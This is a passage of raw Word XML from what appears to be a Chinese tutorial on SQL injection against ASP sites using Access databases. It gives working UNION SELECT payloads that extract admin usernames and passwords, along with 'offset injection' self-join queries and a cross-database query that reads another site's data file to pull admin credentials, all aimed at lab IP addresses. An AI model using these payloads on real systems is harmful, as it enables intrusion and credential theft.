          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5994262C" w14:textId="77777777" w:rsidR="00346D29" w:rsidRPr="00764DAB" w:rsidRDefault="00346D29"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order by 1  //正常</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23895B2D" w14:textId="77777777" w:rsidR="00346D29" w:rsidRPr="00764DAB" w:rsidRDefault="00346D29"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order by 7  //正常</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677B841E" w14:textId="77777777" w:rsidR="00346D29" w:rsidRDefault="00346D29"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http://192.168.1.55:901/news_view.asp?id=14 order by 8  //错误</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08886AA3" w14:textId="77777777" w:rsidR="00742449" w:rsidRPr="00764DAB" w:rsidRDefault="004D7375" w:rsidP="00A33737">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72D54DCF" wp14:editId="7C16F33C">
            <wp:extent cx="5278120" cy="127859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8120" cy="1278590"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="746FACBA" w14:textId="77777777" w:rsidR="00346D29" w:rsidRPr="00764DAB" w:rsidRDefault="00346D29" w:rsidP="00A33737">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说明字段数目为7 ，因此可提交以下字段。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4260A4" w14:textId="77777777" w:rsidR="00346D29" w:rsidRPr="00764DAB" w:rsidRDefault="00346D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w:t>
      </w:r>
      <w:r w:rsidR="00636FBD" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>68.1.55:901/news_view.asp?id=14</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>and 1=2 union select 1</w:t>
      </w:r>
      <w:r w:rsidR="00636FBD" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,2,3,4,5,6,7 from administrator</w:t>
      </w:r>
      <w:r w:rsidR="004D7375">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  (通过联合查询从这7个字段里面去查询administrator表里面那些是可写的数字)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C826432" w14:textId="77777777" w:rsidR="002E5CBF" w:rsidRDefault="002E5CBF" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="002E5CBF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="177E3A83" wp14:editId="609774DA">
            <wp:extent cx="5193830" cy="1383527"/>
            <wp:effectExtent l="19050" t="0" r="682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188506" cy="1382109"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="714AAC4D" w14:textId="77777777" w:rsidR="002E5CBF" w:rsidRDefault="002E5CBF" w:rsidP="00A33737">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>15 union select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C0F384" w14:textId="77777777" w:rsidR="00346D29" w:rsidRPr="00764DAB" w:rsidRDefault="00346D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页面返回信息中，可看到显示了数字2和3(图</w:t>
      </w:r>
      <w:r w:rsidR="00636FBD" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)。因此可以将这2个数字替换为字段名，提交如下查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4AFE5E" w14:textId="77777777" w:rsidR="00636FBD" w:rsidRPr="00764DAB" w:rsidRDefault="00636F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901/news_view.asp?id=14and 1=2 union select 1,</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>user_name</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password</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,4,5,6,7 from administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410D602C" w14:textId="77777777" w:rsidR="00463FD5" w:rsidRPr="003D5726" w:rsidRDefault="00636FBD" w:rsidP="003D5726">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页面返回信息中，立即获得了user_name和password字段的值(图16)，比前面的方法快速高效多了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392F53EC" w14:textId="77777777" w:rsidR="00636FBD" w:rsidRDefault="00636FBD" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D6AB10E" wp14:editId="7117221A">
            <wp:extent cx="5292421" cy="1948069"/>
            <wp:effectExtent l="19050" t="0" r="3479"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293142" cy="1948334"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B359B3" w14:textId="77777777" w:rsidR="00636FBD" w:rsidRDefault="002E5CBF" w:rsidP="00A33737">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>16 union select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爆出字段值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6685277A" w14:textId="77777777" w:rsidR="00020452" w:rsidRDefault="00020452" w:rsidP="00020452">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1.6.4 偏移注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D487267" w14:textId="77777777" w:rsidR="00020452" w:rsidRDefault="00020452" w:rsidP="00020452">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>偏移注入是针对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库，当我们注入猜到数据库表名确猜不到列名的情况下，这种方法就可以帮我们填补。</w:t>
      </w:r>
      <w:r w:rsidR="001F10C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="001F10C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注：</w:t>
      </w:r>
      <w:r w:rsidR="009B7D85">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种方法</w:t>
      </w:r>
      <w:r w:rsidR="001F10C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运气很重要</w:t>
      </w:r>
      <w:r w:rsidR="001F10C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F598F4A" w14:textId="77777777" w:rsidR="00E44291" w:rsidRDefault="00E44291" w:rsidP="00020452">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>第一步</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E44291">
        <w:t xml:space="preserve"> http://192.168.1.106:901/news_view.asp?id=14 UNION SELECT 1,2,3,4,5,6,7 from administrator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当我们把把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询不到的时候，就可以使用下面方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DAFABA" w14:textId="77777777" w:rsidR="00E44291" w:rsidRDefault="00E44291" w:rsidP="00020452">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F842C3E" wp14:editId="2CA21679">
            <wp:extent cx="5278120" cy="209530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8120" cy="2095303"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D17A53" w14:textId="77777777" w:rsidR="00E44291" w:rsidRDefault="00E44291" w:rsidP="00020452">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二步</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E44291">
        <w:t xml:space="preserve"> http://192.168.1.106:901/news_view.asp?id=14 UNION SELECT 1,2,3,4,* from administrator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分别用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>号代替数字，直到返回正常页面</w:t>
      </w:r>
      <w:r w:rsidR="00F147BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。发现在</w:t>
      </w:r>
      <w:r w:rsidR="00F147BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00F147BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的时候页面返回正常，接着我们用</w:t>
      </w:r>
      <w:r w:rsidR="00F147BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7-4=3</w:t>
      </w:r>
      <w:r w:rsidR="00F147BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（代表</w:t>
      </w:r>
      <w:r w:rsidR="00F147BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">administrator </w:t>
      </w:r>
      <w:r w:rsidR="00F147BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有</w:t>
      </w:r>
      <w:r w:rsidR="00F147BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00F147BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个字段）再接着用</w:t>
      </w:r>
      <w:r w:rsidR="00F147BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3*2+1=7</w:t>
      </w:r>
      <w:r w:rsidR="00F147BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来构造第三步注入语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4EAA4E" w14:textId="77777777" w:rsidR="00E44291" w:rsidRDefault="00E44291" w:rsidP="00020452">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6144F287" wp14:editId="2D190554">
            <wp:extent cx="5278120" cy="1924796"/>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78120" cy="1924796"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E8383E" w14:textId="0E5917C5" w:rsidR="00E44291" w:rsidRDefault="00E44291" w:rsidP="00020452">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第</w:t>
      </w:r>
      <w:r w:rsidR="00F147BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>三</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>步</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E44291">
        <w:t xml:space="preserve"> http://192.168.1.106:901/news_view.asp?id=14 UNION SELECT 1, </w:t>
      </w:r>
      <w:r w:rsidR="002B2371">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00F147BE" w:rsidRPr="00F147BE">
        <w:t>.id,</w:t>
      </w:r>
      <w:r w:rsidR="002B2371">
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidR="00F147BE" w:rsidRPr="00F147BE">
        <w:t xml:space="preserve">.id, </w:t>
      </w:r>
      <w:r w:rsidR="00F147BE" w:rsidRPr="00E44291">
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r w:rsidR="00F147BE" w:rsidRPr="00F147BE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E44291">
        <w:t xml:space="preserve">from (administrator as a inner join administrator as </w:t>
      </w:r>
      <w:r w:rsidR="002B2371">
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidRPr="00E44291">
        <w:t xml:space="preserve"> on a.id=</w:t>
      </w:r>
      <w:r w:rsidR="002B2371">
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidRPr="00E44291">
        <w:t>.id)</w:t>
      </w:r>
      <w:r w:rsidR="0046767C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="0046767C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注</w:t>
      </w:r>
      <w:r w:rsidR="0046767C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">:a.id ,b.id </w:t>
      </w:r>
      <w:r w:rsidR="0046767C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每个占三个字段，就是上面</w:t>
      </w:r>
      <w:r w:rsidR="0046767C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3*2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C28E6D" w14:textId="77777777" w:rsidR="00020452" w:rsidRDefault="00F147BE" w:rsidP="0046767C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33EE2AA7" wp14:editId="52E718EA">
            <wp:extent cx="5276850" cy="14097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278120" cy="1410039"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0046767C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第四步</w:t>
      </w:r>
      <w:r w:rsidR="0046767C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="0046767C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果用户名和密码没暴出来，并且字段数多的情况下（例如</w:t>
      </w:r>
      <w:r w:rsidR="0046767C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:10</w:t>
      </w:r>
      <w:r w:rsidR="0046767C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个字段</w:t>
      </w:r>
      <w:r w:rsidR="0046767C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="0046767C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那就是</w:t>
      </w:r>
      <w:r w:rsidR="0046767C" w:rsidRPr="0046767C">
        <w:t>3*3+1=10</w:t>
      </w:r>
      <w:r w:rsidR="0046767C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），那么通过下例语句还可以接着暴用户名和密码</w:t>
      </w:r>
      <w:r w:rsidR="0046767C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="0046767C" w:rsidRPr="0046767C">
        <w:t>http://192.168.1.106:901/news_view.asp?id=14 UNION SELECT 1,a.id,b.id,c.id,* from ((administrator as a inner join administrator as b on a.id=b.id) inner join administrator as c a.id=c.id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDE8E49" w14:textId="77777777" w:rsidR="008958FF" w:rsidRDefault="008958FF" w:rsidP="008958FF">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1.6.5 </w:t>
      </w:r>
      <w:r w:rsidR="001B3E2B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>跨库</w:t>
      </w:r>
      <w:r w:rsidR="001B3E2B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>查询</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01058A8D" w14:textId="77777777" w:rsidR="001B3E2B" w:rsidRDefault="00BD69D4" w:rsidP="00F550FF">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>假设</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两个站点在同一服务器上面，但服务器上面安装了安全狗、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Waf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样的安全软件，现在我们要对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>站点进行攻击，但是没发现什么大漏洞，只找到网站数据库路径，对数据库下载发现下载不了。这个时候我发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>站点有注入点。直接用</w:t>
      </w:r>
      <w:r w:rsidR="001B3E2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="001B3E2B" w:rsidRPr="001B3E2B">
        <w:t>http://192.168.1.106:901/news_view.asp?id=14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA0E95C" w14:textId="77777777" w:rsidR="001B3E2B" w:rsidRDefault="001B3E2B" w:rsidP="00F550FF">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="001B3E2B">
        <w:t xml:space="preserve"> UNION SELECT 1,adminpassword,username,4,5,6,7 from </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542559B8" w14:textId="77777777" w:rsidR="00817088" w:rsidRPr="00636FBD" w:rsidRDefault="001B3E2B" w:rsidP="00F550FF">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="001B3E2B">
        <w:t xml:space="preserve">[C:\wwwtest\2AspCMS\AspCms_data\data.asp].Aspcms_Admins </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06B3B775" wp14:editId="3791ACF1">
            <wp:extent cx="5278120" cy="2092459"/>
            <wp:effectExtent l="19050" t="0" r="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8120" cy="2092459"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EFD158" w14:textId="77777777" w:rsidR="000E099A" w:rsidRPr="00846BAA" w:rsidRDefault="000E099A" w:rsidP="00604925">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00846BAA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>MsSQL数据库高级查询所带来的注入威胁</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063EED39" w14:textId="77777777" w:rsidR="000E099A" w:rsidRPr="00764DAB" w:rsidRDefault="000E099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MsSQL Serve数据库在Web应用程序开发中也占了很大一部分比例，很多脚本语言都能</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>够与之相结合.下面介绍一下基于ASP+MsSQL环境下的注入攻击技术。</w:t>
      </w:r>
    </w:p>
